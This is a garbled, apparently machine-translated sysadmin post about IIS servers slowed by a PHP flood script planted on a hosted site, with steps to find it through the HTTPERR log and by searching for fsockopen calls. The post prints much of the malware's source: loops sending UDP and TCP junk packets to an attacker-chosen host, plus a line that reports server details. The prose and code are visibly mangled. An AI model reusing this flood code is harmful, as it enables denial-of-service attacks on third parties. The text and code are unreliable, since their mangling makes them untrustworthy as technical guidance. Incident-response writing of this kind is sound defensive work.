Recently, several servers have been Lsass.exe occupied CPU too high, not too tall, and after a period of time will return to normal, high CPU directly caused the site to open very slowly, weeks and repeatedly.
In the CPU running high, accompanied by a is like a network of floating, and sometimes uploaded unexpectedly reached the 30m-90m/s, external attack, the first time to think that there may be this reason, that specific how to check it?
Common external documents, this thing can be found online search.
Copy Code code as follows:
<?php
Set_time_limit (86400);
Ignore_user_abort (True);
$packets = 0;
$http = $_request[' http '];
$rand = $_request[' exit '];
$exec _time = $_request[' time '];
........
echo $_request[' rat '].$_server["Http_host"]. "|". gethostbyname ($_server[' server_name '). "|". Php_uname (). "|". $_server[' server_software '].$_request[' rat '];
Exit
}
echo "PHP Terminator";
Exit
}
For ($i =0 $i <65535; $i + +)
{
$out. = "X";
}
/........
}
$fp = Fsockopen ("udp://$http", $rand, $errno, $ERRSTR, 5);
if ($FP)
{
Fwrite ($fp, $out);
Fclose ($FP);
}
}
Else
if ($rand ==500)
while (1)
{
$packets + +;
if (Time () > $max _time) {
Break
}
$fp = Pfsockopen ("udp://$http", $rand, $errno, $ERRSTR, 5);
if ($FP)
{
Fwrite ($fp, $out);
Fclose ($FP);
}
}
Else
while (1)
{
$packets + +;
if (Time () > $max _time) {
Break
}
$fp = Pfsockopen ("tcp://$http", $rand, $errno, $ERRSTR, 5);
if ($FP)
{
Fwrite ($fp, $out);
Fclose ($FP);
}
}
?>
So how do you find out which station it is?
You can open the log
C:\Windows\System32\LogFiles\HTTPERR\httperr...log, open the file for today's time,
There's a record like this:
Copy Code code as follows:
2011-04-26 06:37:28 58.255.112.112 26817 98.126.247.13-http/1.1 445&TIME=120 503 783 Disabled 30_freehost_1
Last three items 783 Disabled 30_freehost_1
783 is the ID of this station in IIS
30_freehost_1 is the same pool.
Solution:
Find this site, the next want to solve is good, if the conditions allow, you can directly disable the Fsockopen This function, of course, this is not applicable in most cases.
Then go to the root of this site to find it.
Copy Code code as follows:
$fp = Fsockopen ("udp://$http", $rand, $errno, $ERRSTR, 5);
Can use some tools to find the above sentence, or find $fp = Fsockopen, so that its attack on the file on the hidden, of course, do not delete the normal mail to send files, and finally restart the service, Ah, no card.